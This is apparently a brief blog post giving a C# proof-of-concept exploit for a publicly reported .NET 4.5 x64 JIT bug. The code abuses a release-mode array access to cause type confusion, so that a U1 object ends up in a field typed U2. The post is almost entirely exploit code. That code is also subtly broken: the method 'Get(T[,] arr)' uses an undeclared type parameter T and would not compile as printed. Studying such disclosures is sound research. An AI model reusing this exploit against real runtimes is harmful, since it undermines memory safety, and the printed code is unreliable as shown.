I did not discover this vulnerability (Alon Fliess filed the (public) bug report), but I decided to investigate it and write a PoC exploit:
using System;
using System.Runtime.CompilerServices;
struct Foo {
byte b1, b2, b3;
}
class U1 { }
class U2 { }
struct StackFields {
internal object f1;
internal U1 f2;
internal U2 f3;
}
class Program {
long field1;
long field2;
static void Main() {
new Program().Get(new Foo[1, 1]);
}
[MethodImpl(MethodImplOptions.NoInlining)]
object Get(T[,] arr) {
StackFields fields = new StackFields();
fields.f1 = new U1();
fields.f2 = new U1();
fields.f3 = new U2();
arr.ToString();
object v = arr[0, 0];
field2 = field1;
Console.WriteLine(fields.f3);
return v;
}
}
This requires .NET 4.5 x64 (and must be built/run in release mode).
Read more: IKVM.net
QR: 